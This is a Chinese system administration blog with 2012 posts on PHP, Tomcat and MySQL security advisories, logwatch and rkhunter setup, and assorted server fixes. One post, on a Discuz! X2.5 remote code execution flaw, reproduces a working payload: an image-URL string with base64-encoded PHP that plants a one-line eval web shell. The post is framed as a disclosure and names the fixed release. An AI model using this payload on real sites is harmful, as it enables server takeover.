C1G军火库

bash: /dev/null: Permission denied

C1G — Fri, 18 May 2012 05:58:08 +0000

查看了下/dev/null变成600了,在执行/etc/profile.d/*.sh下脚本时没报没有权限.

rm -f /dev/null
mknod -m 666 /dev/null c 1 3

PHP 5.3.x目录遍历漏洞（CVE-2012-1172）

C1G — Wed, 09 May 2012 09:01:49 +0000

漏洞版本:
PHP 5.3.x
漏洞描述:
BUGTRAQ ID: 53403
CVE ID: CVE-2012-1172

PHP在实现上存在目录遍历漏洞，远程攻击者可利用带有目录遍历序列的特制请求检索、破坏或上传任意位置上的任意文件。
<* 参考
https://bugzilla.redhat.com/show_bug.cgi?id=799187
*>
安全建议:
厂商补丁：

PHP
—
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.php.net

PHP 5.3.11 and 5.4.1 fix this

注意修改康盛产品的跨域策略crossdomain.xml文件

C1G — Wed, 09 May 2012 08:03:08 +0000

discuz,uchome,ucenter的根目录下都会有这个crossdomain.xml
此文件为flash在跨域时的限制策略,如果没有跨域需求记得限制在当前域名下

默认文件

修改为只充许*.c1gstudio.com

参考discuz的修改
http://www.discuz.net/crossdomain.xml
http://x.discuz.net/crossdomain.xml
http://www.80sec.com/flash-security-polic.html

用 Logwatch 工具查看 Linux 系统 Log 日志

C1G — Wed, 02 May 2012 07:21:09 +0000

logwatch 是用perl写的一款方便小巧的日志查看工具,可以每天给你发一封格化后的系统信息邮件;
包含crontab运行中的脚本、ssh登录及失败用户ip、su及sudo用户、磁盘空间及邮件等情况…
一般系统中都默认安装它,只需简单配置下就可运行.

http://www.logwatch.org/
目前最新版为logwatch-7.4.0,logwatch-7.3.6
centos里yum装的为logwatch-7.3.6

安装
rpm -Ivh logwatch***.rpm
升级
rpm -Uvh logwatch***.rpm
yum安装升级
yum -y install logwatch

#复制配置文件
cp -af /usr/share/logwatch/default.conf/logwatch.conf /etc/logwatch/conf/logwatch.conf
#打开每日邮件报告
sed -i 's/# DailyReport = No/DailyReport = Yes/' /etc/logwatch/conf/logwatch.conf
#修改邮件mta,如果是本机sendmail或postfix不不需修改,这个用的是mailx的远程smtp
sed -i 's/mailer = "sendmail -t"/mailer = "mail -t"/' /etc/logwatch/conf/logwatch.conf
#报告的细节程度
sed -i 's/Detail = Low/Detail = High/' /etc/logwatch/conf/logwatch.conf
#邮件发给谁
sed -i "s/MailTo = root/MailTo = root,c1g@c1gstudio.com/" /etc/logwatch/conf/logwatch.conf

logwatch默认每天执行一次，可以从/etc/cron.daily里看到
ll /etc/cron.daily/

total 28
-rwxr-xr-x 1 root root 265 Jun 25 2011 0logwatch

红帽as4系统中配置文件位于/etc/log.d/logwatch.conf

【转】php-5.3.x中弃用的功能和函数

C1G — Sat, 28 Apr 2012 02:14:04 +0000

PHP 5.3.0 新增了两个错误等级: E_DEPRECATED 和 E_USER_DEPRECATED. 错误等级 E_DEPRECATED 被用来说明一个函数或者功能已经被弃用. E_USER_DEPRECATED 等级目的在于表明用户代码中的弃用功能, 类似于 E_USER_ERROR 和 E_USER_WARNING等级.下面是被弃用的 INI 指令列表. 使用下面任何指令都将导致 E_DEPRECATED 错误.

define_syslog_variables
register_globals
register_long_arrays
safe_mode
magic_quotes_gpc
magic_quotes_runtime
magic_quotes_sybase

弃用的函数:
call_user_method() (使用 call_user_func() 替代)
call_user_method_array() (使用 call_user_func_array() 替代)
define_syslog_variables()
dl()
ereg() (使用 preg_match() 替代)
ereg_replace() (使用 preg_replace() 替代)
eregi() (使用 preg_match() 配合 ‘i’ 修正符替代)
eregi_replace() (使用 preg_replace() 配合 ‘i’ 修正符替代)
set_magic_quotes_runtime() 以及它的别名函数 magic_quotes_runtime()
session_register() (使用 $_SESSION 超全部变量替代)
session_unregister() (使用 $_SESSION 超全部变量替代)
session_is_registered() (使用 $_SESSION 超全部变量替代)
set_socket_blocking() (使用 stream_set_blocking() 替代)
split() (使用 preg_split() 替代)
spliti() (使用 preg_split() 配合 ‘i’ 修正符替代)
sql_regcase()
mysql_db_query() (使用 mysql_select_db() 和 mysql_query() 替代)
mysql_escape_string() (使用 mysql_real_escape_string() 替代)

不向下兼容的变化
尽管大多数现有的 PHP 5 代码无需改变就可以工作，但是请注意一些不向下兼容的变化：
在 PHP 5.3.x 的所有绑定扩展中应用了新的内部参数解析API, 当给函数传递了不兼容的参数时将返回 NULL. 但有一些例外，比如函数 get_class() 在出现错误时将会返回 FALSE.
clearstatcache() 默认不再清除缓存的 realpath.
realpath() 现在是完全与平台无关的. 结果是非法的相对路径比如 __FILE__ . “/../x” 将不会工作.
call_user_func() 系列函数即使被调用者是一个父类也使用 $this.
数组函数 natsort(), natcasesort(), usort(), uasort(), uksort(), array_flip(), 和 array_unique() 将不再接受对象作为参数. 在将这些函数应用于对象时, 请首先将对象转换为数组.
按引用传递参数的函数在被按值传递调用时行为发生改变. 此前函数将接受按值传递的参数, 现在将抛出致命错误. 之前任何期待传递引用但是在调用时传递了常量或者字面值的函数, 需要在调用前改为将该值赋给一个变量。
新的 mysqlnd 库需要使用 MySQL 4.1 新的 41 字节密码格式。继续使用旧的 16 字节密码将导致 mysql_connect() 和其它类似函数抛出 “mysqlnd cannot connect to MySQL 4.1+ using old authentication.” 错误.
新的 mysqlnd 库将不再读取 MySQL 配置文件(my.cnf/my.ini), 这与旧版本的 libmysql 库不同. 如果你的代码依赖于这些配置文件, 你可以使用 mysqli_options() 显式地加载它. 注意, 这意味着如果 PDO 中的 MySQL 支持使用了 mysqlnd 进行编译，PDO 特有常量 PDO::MYSQL_ATTR_READ_DEFAULT_FILE 和 PDO::MYSQL_ATTR_READ_DEFAULT_GROUP 将是未定义的.
SplFileInfo 及其相关目录类会移除末尾的 /.
__toString 魔术方法不再接受参数.
魔术方法 __get, __set, __isset, __unset, and __call 应该总是公共的(public)且不能是静态的(static). 方法签名是必须的.
现在 __call 魔术方法在访问私有的(private)和被保护的(protected)方法时被调用.
函数内 include() 或者 require() 一个文件时，文件内将不能使用 func_get_arg(), func_get_args() 和 func_num_args() 函数。
新增了一个包裹在 MHASH 扩展外面的仿真层。但是并非所有的算法都涉及到了，值得注意的是 s2k 哈希算法。这意味着 s2k 哈希算法在 PHP 5.3.0 中不再可用。

转自:http://www.rootsec.org/post/php-5-3-x%E4%B8%AD%E5%90%AF%E7%94%A8%E7%9A%84%E5%8A%9F%E8%83%BD%E5%92%8C%E5%87%BD%E6%95%B0.html

Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]

C1G — Sat, 28 Apr 2012 01:35:09 +0000

发布时间: 2012-04-27
漏洞版本:Discuz! X2.5Release20120407
漏洞描述:
Discuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号，在实现上存在远程命令执行漏洞，远程攻击者可利用此漏洞执行远程任意代码。要成功利用此漏洞需要目标启用seo功能。

测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
1,注册任意账户
2,登陆用户，发表blog日志（注意是日志）
3,添加图片，选择网络图片，地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4,访问日志，论坛根目录下生成demo.php，一句话密码C

Discuz已经发布了新版Discuz! X2.5 R20120427

http://www.discuz.net/thread-2744369-1-1.html

参考

http://sebug.net/vuldb/ssvid-60082

http://www.wooyun.org/bugs/wooyun-2012-06420

http://yaonie.org/archives/165

补充:PHP 5.4/5.3弃用eregi()函数内存限制绕过漏洞
危害
远程攻击者可以利用漏洞耗尽系统内存。

攻击所需条件
攻击者必须访问PHP应用。

漏洞信息
PHP 5.3之后弃用了基于POSIX规则表达式的函数如eregi，但在5.4.0版本中仍然使用这些函数，可被利用绕过memory_limit，通过eregi()耗尽内存。

测试方法

http://cxsecurity.com/issue/WLB-2012030271

漏洞消息链接

http://marc.info/?l=bugtraq&m=133311683110469&w=2

漏洞消息标题
PHP 5.4/5.3 deprecated eregi() memory_limit bypass

Apache Tomcat 6.0.35前有拒绝服务,信息泄露等漏洞

C1G — Fri, 20 Apr 2012 09:33:29 +0000

Apache Tomcat 6.0.35前有信息泄露相关的一个漏洞（CVE-2011-3375），
以及另一个在此前广受关注的哈希碰撞引发拒绝服务（DoS）漏洞（CVE-2012-0022），
Apache 建议用户对 Tomcat 进行升级从而规避此漏洞。

http://tomcat.apache.org/security-6.html

一.安装Oracle JRockit
使用Oracle JRockit 可以提高tomcat性能
当前版本Oracle JRockit 6 – R28.2.3
Includes JRockit Mission Control 4.1 and JRockit Real Time 4.1
http://download.oracle.com/otn/bea/jrockit/jrockit-jdk1.6.0_31-R28.2.3-4.1.0-linux-x64.bin

需登录后下载

chmod u+x jrockit-jdk1\[1\].6.0_31-R28.2.3-4.1.0-linux-x64.bin
./jrockit-jdk1\[1\].6.0_31-R28.2.3-4.1.0-linux-x64.bin

遇到以下错误可能是/tmp没有执行权限

sh: jre150_12/bin/java: Permission denied
** Error during execution, error code = 32256.

按照提示一步步安装到
/usr/jrockit-jdk1.6.0_31-R28.2.3-4.1.0
做个软链接

ln -s /usr/jrockit-jdk1.6.0_31-R28.2.3-4.1.0 /usr/jrrt

二.安装apr
yum install apr apr-util apr-devel

tomcat需要tomcat-native,而tomcat-native需要apr和openssl
没有apr启动tomcat可能会有以下错误

2012-4-20 13:28:37 org.apache.catalina.core.AprLifecycleListener init
信息: The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: /usr/jrockit-jdk1.6.0_31-R28.2.3-4.1.0/jre/lib/amd64/jrockit:/usr/jrockit-jdk1.6.0_31-R28.2.3-4.1.0/jre/lib/amd64:/usr/jrockit-jdk1.6.0_31-R28.2.3-4.1.0/jre/../lib/amd64

三.tomcat 安装
tomcat安装在/opt/下

cd /root/src/
wget http://labs.renren.com/apache-mirror/tomcat/tomcat-6/v6.0.35/bin/apache-tomcat-6.0.35.tar.gz
tar zxvf apache-tomcat-6.0.35.tar.gz
mv apache-tomcat-6.0.35 /opt/
cd /opt
#复制配制文件
cp -ar tomcat/conf/*.xml apache-tomcat-6.0.35/conf/
#复制经过修改的关闭脚本,原生的有问题
cp tomcat/bin/shutdown.sh apache-tomcat-6.0.35/bin/

四.安装tomcat-native

cd apache-tomcat-6.0.35/bin
tar zxvf tomcat-native-1.1.22-src.tar.gz
cd tomcat-native-1.1.22-src/jni/native/
./configure --with-apr=/usr/bin/apr-1-config --with-java-home=/usr/jrockit-jdk1.6.0_31-R28.2.3-4.1.0
make
make install

五.编辑变量
vi /etc/profile

JAVA_HOME=/usr/jrrt
export JAVA_HOME
PATH=$PATH:$JAVA_HOME/bin
#原始设置省略
APR_HOME=/usr/local/apr
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$APR_HOME/lib
export LD_LIBRARY_PATH

重新载入
source /etc/profile

六.迁移服务及应用
关闭tomcat
/opt/tomcat/bin/shutdown.sh

cd /opt
mv apache-tomcat-6.0.35/webapps/ apache-tomcat-6.0.35/webappsorg
cp -ar tomcat/webapps apache-tomcat-6.0.35/
mv apache-tomcat-6.0.35/lib/ apache-tomcat-6.0.35/libbak
cp -ar tomcat/lib/ apache-tomcat-6.0.35/
mv apache-tomcat-6.0.35/libbak/* apache-tomcat-6.0.35/lib/

删除软链接

rm /opt/tomcat
ln -s /opt/apache-tomcat-6.0.35 /opt/tomcat

启动tomcat
/opt/tomcat/bin/startup.sh
检查日志及服务
tail -n100 /opt/tomcat/logs/catalina.out

参考:
tomcat安全设置
 优化tomcat 内存
 CentOs5.2安装tomcat
使用Oracle JRockit 提高tomcat性能

centos/rhel 6.x部分系统在运行208.5天后可能会重启

C1G — Fri, 20 Apr 2012 04:01:00 +0000

centos/rhel 6.x部分kernel版本由于计数器溢出的bug，208.5天后可能会造成kernel panic

https://rhn.redhat.com/errata/RHBA-2012-0124.html
Updated kernel packages that fix one bug are now available for Red Hat
Enterprise Linux 6.

The kernel packages contain the Linux kernel, the core of any Linux operating
system.

This update fixes the following bug:

* An insufficiently designed calculation in the CPU accelerator in the previous
kernel caused an arithmetic overflow in the sched_clock() function when system
uptime exceeded 208.5 days. This overflow led to a kernel panic on the systems
using the Time Stamp Counter (TSC) or Virtual Machine Interface (VMI) clock
source. This update corrects the aforementioned calculation so that this
arithmetic overflow and kernel panic can no longer occur under these
circumstances. (BZ#781974)

All users are advised to upgrade to these updated packages, which fix this bug.
The system must be rebooted for this update to take effect.

参考:

http://hi.baidu.com/beibeiboo/blog/item/90a5d3ec8f41570762d09f89.html

Oracle发布了本季安全补丁,包含了mysql在内的高危漏洞补丁

C1G — Thu, 19 Apr 2012 01:42:39 +0000

mysql 5.1.61 和mysql 5.5.21之前的版本都受影响,以下列出关于mysql的信息http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixMSQL

Oracle MySQL Executive Summary

This Critical Patch Update contains 6 new security fixes for Oracle MySQL. None of these vulnerabilities may be remotely exploitable without authentication, i.e., none may be exploited over a network without the need for a username and password. The English text form of this Risk Matrix can be found here.

Oracle MySQL Risk Matrix

CVE#	Component	Protocol	Sub- component	Remote Exploit without Auth.?	CVSS VERSION 2.0 RISK (see Risk Matrix Definitions)							Supported Versions Affected	Notes
CVE#	Component	Protocol	Sub- component	Remote Exploit without Auth.?	Base Score	Access Vector	Access Complexity	Authen- tication	Confiden- tiality	Integrity	Avail- ability	Supported Versions Affected	Notes
CVE-2012-1703	MySQL Server	MySQL Protocol	Server Optimizer	No	6.8	Network	Low	Single	None	None	Complete	5.1.61 and earlier, 5.5.21 and earlier
CVE-2012-0583	MySQL Server	MySQL Protocol	MyISAM	No	4.0	Network	Low	Single	None	None	Partial+	5.1.60 and earlier, 5.5.19 and earlier
CVE-2012-1697	MySQL Server	MySQL Protocol	Partition	No	4.0	Network	Low	Single	None	None	Partial+	5.5.21 and earlier
CVE-2012-1688	MySQL Server	MySQL Protocol	Server DML	No	4.0	Network	Low	Single	None	None	Partial+	5.1.61 and earlier, 5.5.21 and earlier
CVE-2012-1696	MySQL Server	MySQL Protocol	Server Optimizer	No	4.0	Network	Low	Single	None	None	Partial+	5.5.19 and earlier
CVE-2012-1690	MySQL Server	MySQL Protocol	Server Optimizer	No	4.0	Network	Low	Single	None	None	Partial+	5.1.61 and earlier, 5.5.21 and earlier

Text Form of Risk Matrix for Oracle MySQL

This table provides the text form of the Risk Matrix for Oracle MySQL.

CVE Identifier	Description
CVE-2012-0583	Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: MyISAM). Supported versions that are affected are 5.1.60 and earlier and 5.5.19 and earlier. Easily exploitable vulnerability allows successful authenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server.CVSS Base Score 4.0 (Availability impacts). CVSS V2 Vector: (AV:N/AC:L/Au:S/C:N/I:N/A:P). (legend) [Advisory]
CVE-2012-1688	Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server DML). Supported versions that are affected are 5.1.61 and earlier and 5.5.21 and earlier. Easily exploitable vulnerability allows successful authenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server.CVSS Base Score 4.0 (Availability impacts). CVSS V2 Vector: (AV:N/AC:L/Au:S/C:N/I:N/A:P). (legend) [Advisory]
CVE-2012-1690	Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server Optimizer). Supported versions that are affected are 5.1.61 and earlier and 5.5.21 and earlier. Easily exploitable vulnerability allows successful authenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server.CVSS Base Score 4.0 (Availability impacts). CVSS V2 Vector: (AV:N/AC:L/Au:S/C:N/I:N/A:P). (legend) [Advisory]
CVE-2012-1696	Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server Optimizer). Supported versions that are affected are 5.5.19 and earlier. Easily exploitable vulnerability allows successful authenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server.CVSS Base Score 4.0 (Availability impacts). CVSS V2 Vector: (AV:N/AC:L/Au:S/C:N/I:N/A:P). (legend) [Advisory]
CVE-2012-1697	Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Partition). Supported versions that are affected are 5.5.21 and earlier. Easily exploitable vulnerability allows successful authenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server.CVSS Base Score 4.0 (Availability impacts). CVSS V2 Vector: (AV:N/AC:L/Au:S/C:N/I:N/A:P). (legend) [Advisory]
CVE-2012-1703	Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server Optimizer). Supported versions that are affected are 5.1.61 and earlier and 5.5.21 and earlier. Easily exploitable vulnerability allows successful authenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized Operating System hang or frequently repeatable crash (complete DOS).CVSS Base Score 6.8 (Availability impacts). CVSS V2 Vector: (AV:N/AC:L/Au:S/C:N/I:N/A:C). (legend) [Advisory]

入侵检测工具rkhunter安装

C1G — Mon, 16 Apr 2012 06:53:54 +0000

rkhunter是Linux下的一款开源入侵检测工具。rkhunter具有比chrootkit更为全面的扫描范围。除rootkit特征码扫描外，rkhunter还支持端口扫描，常用开源软件版本和文件变动情况检查等。
rkhunter的官方网站位于http://www.rootkit.nl/，目前最新的版本是rkhunter-1.3.8。

centos5.8
Linux C1gstudio 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux

一.安装
安装到自定义目录/usr/local/rkhunter

wget http://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.3.8/rkhunter-1.3.8.tar.gz
tar zxvf rkhunter-1.3.8.tar.gz
cd rkhunter-1.3.8
mkdir -p /usr/local/rkhunter
./installer.sh --layout custom /usr/local/rkhunter --install

Note: Directory /usr/local/rkhunter/bin is not in your PATH
Checking system for:
Rootkit Hunter installer files: found
A web file download command: wget found
Starting installation:
Checking installation directory "/usr/local/rkhunter": it exists and is writable.
Checking installation directories:
Directory /usr/local/rkhunter/share/doc/rkhunter-1.3.8: creating: OK
Directory /usr/local/rkhunter/share/man/man8: creating: OK
Directory /usr/local/rkhunter/etc: creating: OK
Directory /usr/local/rkhunter/bin: creating: OK
Directory /usr/local/rkhunter/lib64: creating: OK
Directory /usr/local/rkhunter/var/lib: creating: OK
Directory /usr/local/rkhunter/lib64/rkhunter/scripts: creating: OK
Directory /usr/local/rkhunter/var/lib/rkhunter/db: creating: OK
Directory /usr/local/rkhunter/var/lib/rkhunter/tmp: creating: OK
Directory /usr/local/rkhunter/var/lib/rkhunter/db/i18n: creating: OK
Installing check_modules.pl: OK
Installing filehashsha.pl: OK
Installing stat.pl: OK
Installing readlink.sh: OK
Installing backdoorports.dat: OK
Installing mirrors.dat: OK
Installing programs_bad.dat: OK
Installing suspscan.dat: OK
Installing rkhunter.8: OK
Installing ACKNOWLEDGMENTS: OK
Installing CHANGELOG: OK
Installing FAQ: OK
Installing LICENSE: OK
Installing README: OK
Installing language support files: OK
Installing rkhunter: OK
Installing rkhunter.conf: OK
Installation complete

/usr/local/rkhunter/bin/rkhunter –help

Usage: rkhunter {--check | --unlock | --update | --versioncheck |
--propupd [{filename | directory | package name},...] |
--list [{tests | {lang | languages} | rootkits | perl}] |
--config-check | --version | --help} [options]
Current options are:
--append-log Append to the logfile, do not overwrite
--bindir ... Use the specified command directories
-c, --check Check the local system
-C, --config-check Check the configuration file(s), then exit
--cs2, --color-set2 Use the second color set for output
--configfile Use the specified configuration file
--cronjob Run as a cron job
(implies -c, --sk and --nocolors options)
--dbdir Use the specified database directory
--debug Debug mode
(Do not use unless asked to do so)
--disable [,...] Disable specific tests
(Default is to disable no tests)
--display-logfile Display the logfile at the end
--enable [,...] Enable specific tests
(Default is to enable all tests)
--hash {MD5 | SHA1 | SHA224 | SHA256 | SHA384 | SHA512 |
NONE | } Use the specified file hash function
(Default is SHA1, then MD5)
-h, --help Display this help menu, then exit
--lang, --language Specify the language to use
(Default is English)
--list [tests | languages | List the available test names, languages, checked
rootkits | perl] for rootkits, or perl module status, then exit
-l, --logfile [file] Write to a logfile
(Default is /var/log/rkhunter.log)
--noappend-log Do not append to the logfile, overwrite it
--nocf Do not use the configuration file entries
for disabled tests (only valid with --disable)
--nocolors Use black and white output
--nolog Do not write to a logfile
--nomow, --no-mail-on-warning Do not send a message if warnings occur
--ns, --nosummary Do not show the summary of check results
--novl, --no-verbose-logging No verbose logging
--pkgmgr {RPM | DPKG | BSD | Use the specified package manager to obtain or
SOLARIS | NONE} verify file property values. (Default is NONE)
--propupd [file | directory | Update the entire file properties database,
package]... or just for the specified entries
-q, --quiet Quiet mode (no output at all)
--rwo, --report-warnings-only Show only warning messages
-r, --rootdir Use the specified root directory
--sk, --skip-keypress Don't wait for a keypress after each test
--summary Show the summary of system check results
(This is the default)
--syslog [facility.priority] Log the check start and finish times to syslog
(Default level is authpriv.notice)
--tmpdir Use the specified temporary directory
--unlock Unlock (remove) the lock file
--update Check for updates to database files
--vl, --verbose-logging Use verbose logging (on by default)
-V, --version Display the version number, then exit
--versioncheck Check for latest version of program
-x, --autox Automatically detect if X is in use
-X, --no-autox Do not automatically detect if X is in use

更新db
/usr/local/rkhunter/bin/rkhunter –update

[ Rootkit Hunter version 1.3.8 ]
Checking rkhunter data files...
Checking file mirrors.dat [ No update ]
Checking file programs_bad.dat [ Updated ]
Checking file backdoorports.dat [ No update ]
Checking file suspscan.dat [ No update ]
Checking file i18n/cn [ No update ]
Checking file i18n/de [ No update ]
Checking file i18n/en [ No update ]
Checking file i18n/zh [ No update ]
Checking file i18n/zh.utf8 [ No update ]

ll /usr/local/rkhunter/var/lib/rkhunter/db/

total 20
-rw-r----- 1 root root 1055 Apr 9 13:43 backdoorports.dat
drwxr-x--- 2 root root 4096 Apr 9 13:43 i18n
-rw-r----- 1 root root 58 Apr 9 13:44 mirrors.dat
-rw-r----- 1 root root 3203 Apr 9 13:44 programs_bad.dat
-rw-r----- 1 root root 1904 Apr 9 13:43 suspscan.dat

在系统“干净”的时候产生对比文件
/usr/local/rkhunter/bin/rkhunter –propupd
[ Rootkit Hunter version 1.3.8 ]
File created: searched for 164 files, found 135

多了rkhunter.dat,rkhunter_prop_list.dat文件
ll /usr/local/rkhunter/var/lib/rkhunter/db/

total 68
-rw-r----- 1 root root 1055 Apr 9 13:43 backdoorports.dat
drwxr-x--- 2 root root 4096 Apr 9 13:43 i18n
-rw-r----- 1 root root 58 Apr 9 13:44 mirrors.dat
-rw-r----- 1 root root 3203 Apr 9 13:44 programs_bad.dat
-rw-r----- 1 root root 12958 Apr 9 13:47 rkhunter.dat
-rw-r----- 1 root root 31798 Apr 9 13:47 rkhunter_prop_list.dat
-rw-r----- 1 root root 1904 Apr 9 13:43 suspscan.dat

二.开始检查,有问题会红色的Warning 提示
/usr/local/rkhunter/bin/rkhunter -c –sk

[ Rootkit Hunter version 1.3.8 ]
Checking system commands...
Performing 'strings' command checks
Checking 'strings' command [ OK ]
Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preloaded libraries [ None found ]
Checking LD_LIBRARY_PATH variable [ OK ]
Performing file properties checks
Checking for prerequisites [ OK ]
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/fsck [ OK ]
/sbin/fuser [ OK ]
/sbin/ifconfig [ OK ]
/sbin/ifdown [ Warning ]
/sbin/ifup [ Warning ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/ip [ OK ]
/sbin/kudzu [ OK ]
/sbin/lsmod [ OK ]
/sbin/modinfo [ OK ]
/sbin/modprobe [ OK ]
/sbin/nologin [ OK ]
/sbin/rmmod [ OK ]
/sbin/route [ OK ]
/sbin/rsyslogd [ OK ]
/sbin/runlevel [ OK ]
/sbin/sulogin [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/bin/awk [ OK ]
/bin/basename [ OK ]
/bin/bash [ OK ]
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/cp [ OK ]
/bin/csh [ OK ]
/bin/cut [ OK ]
/bin/date [ OK ]
/bin/df [ OK ]
/bin/dmesg [ OK ]
/bin/echo [ OK ]
/bin/ed [ OK ]
/bin/egrep [ OK ]
/bin/env [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/kill [ OK ]
/bin/logger [ OK ]
/bin/login [ OK ]
/bin/ls [ OK ]
/bin/mail [ OK ]
/bin/mktemp [ OK ]
/bin/more [ OK ]
/bin/mount [ OK ]
/bin/mv [ OK ]
/bin/netstat [ OK ]
/bin/ps [ OK ]
/bin/pwd [ OK ]
/bin/rpm [ OK ]
/bin/sed [ OK ]
/bin/sh [ OK ]
/bin/sort [ OK ]
/bin/su [ OK ]
/bin/touch [ OK ]
/bin/uname [ OK ]
/bin/gawk [ OK ]
/bin/tcsh [ OK ]
/usr/sbin/adduser [ OK ]
/usr/sbin/chroot [ OK ]
/usr/sbin/groupadd [ OK ]
/usr/sbin/groupdel [ OK ]
/usr/sbin/groupmod [ OK ]
/usr/sbin/grpck [ OK ]
/usr/sbin/kudzu [ OK ]
/usr/sbin/lsof [ OK ]
/usr/sbin/prelink [ OK ]
/usr/sbin/pwck [ OK ]
/usr/sbin/sestatus [ OK ]
/usr/sbin/tcpd [ OK ]
/usr/sbin/useradd [ OK ]
/usr/sbin/userdel [ OK ]
/usr/sbin/usermod [ OK ]
/usr/sbin/vipw [ OK ]
/usr/bin/awk [ OK ]
/usr/bin/chattr [ OK ]
/usr/bin/curl [ OK ]
/usr/bin/cut [ OK ]
/usr/bin/diff [ OK ]
/usr/bin/dirname [ OK ]
/usr/bin/du [ OK ]
/usr/bin/env [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/groups [ Warning ]
/usr/bin/head [ OK ]
/usr/bin/id [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/last [ OK ]
/usr/bin/lastlog [ OK ]
/usr/bin/ldd [ Warning ]
/usr/bin/less [ OK ]
/usr/bin/locate [ OK ]
/usr/bin/logger [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/md5sum [ OK ]
/usr/bin/newgrp [ OK ]
/usr/bin/passwd [ OK ]
/usr/bin/perl [ OK ]
/usr/bin/pgrep [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/readlink [ OK ]
/usr/bin/runcon [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/sha224sum [ OK ]
/usr/bin/sha256sum [ OK ]
/usr/bin/sha384sum [ OK ]
/usr/bin/sha512sum [ OK ]
/usr/bin/size [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/strace [ OK ]
/usr/bin/strings [ OK ]
/usr/bin/sudo [ OK ]
/usr/bin/tail [ OK ]
/usr/bin/test [ OK ]
/usr/bin/top [ OK ]
/usr/bin/tr [ OK ]
/usr/bin/uniq [ OK ]
/usr/bin/users [ OK ]
/usr/bin/vmstat [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/wc [ OK ]
/usr/bin/wget [ OK ]
/usr/bin/whatis [ Warning ]
/usr/bin/whereis [ OK ]
/usr/bin/which [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
/usr/bin/gawk [ OK ]
/usr/local/rkhunter/etc/rkhunter.conf [ OK ]
Checking for rootkits...
Performing check of known rootkit files and directories
55808 Trojan - Variant A [ Not found ]
ADM Worm [ Not found ]
AjaKit Rootkit [ Not found ]
Adore Rootkit [ Not found ]
aPa Kit [ Not found ]
Apache Worm [ Not found ]
Ambient (ark) Rootkit [ Not found ]
Balaur Rootkit [ Not found ]
BeastKit Rootkit [ Not found ]
beX2 Rootkit [ Not found ]
BOBKit Rootkit [ Not found ]
cb Rootkit [ Not found ]
CiNIK Worm (Slapper.B variant) [ Not found ]
Danny-Boy's Abuse Kit [ Not found ]
Devil RootKit [ Not found ]
Dica-Kit Rootkit [ Not found ]
Dreams Rootkit [ Not found ]
Duarawkz Rootkit [ Not found ]
Enye LKM [ Not found ]
Flea Linux Rootkit [ Not found ]
FreeBSD Rootkit [ Not found ]
Fu Rootkit [ Not found ]
Fuck`it Rootkit [ Not found ]
GasKit Rootkit [ Not found ]
Heroin LKM [ Not found ]
HjC Kit [ Not found ]
ignoKit Rootkit [ Not found ]
iLLogiC Rootkit [ Not found ]
IntoXonia-NG Rootkit [ Not found ]
Irix Rootkit [ Not found ]
Kitko Rootkit [ Not found ]
Knark Rootkit [ Not found ]
ld-linuxv.so Rootkit [ Not found ]
Li0n Worm [ Not found ]
Lockit / LJK2 Rootkit [ Not found ]
Mood-NT Rootkit [ Not found ]
MRK Rootkit [ Not found ]
Ni0 Rootkit [ Not found ]
Ohhara Rootkit [ Not found ]
Optic Kit (Tux) Worm [ Not found ]
Oz Rootkit [ Not found ]
Phalanx Rootkit [ Not found ]
Phalanx2 Rootkit [ Not found ]
Phalanx2 Rootkit (extended tests) [ Not found ]
Portacelo Rootkit [ Not found ]
R3dstorm Toolkit [ Not found ]
RH-Sharpe's Rootkit [ Not found ]
RSHA's Rootkit [ Not found ]
Scalper Worm [ Not found ]
Sebek LKM [ Not found ]
Shutdown Rootkit [ Not found ]
SHV4 Rootkit [ Not found ]
SHV5 Rootkit [ Not found ]
Sin Rootkit [ Not found ]
Slapper Worm [ Not found ]
Sneakin Rootkit [ Not found ]
'Spanish' Rootkit [ Not found ]
Suckit Rootkit [ Not found ]
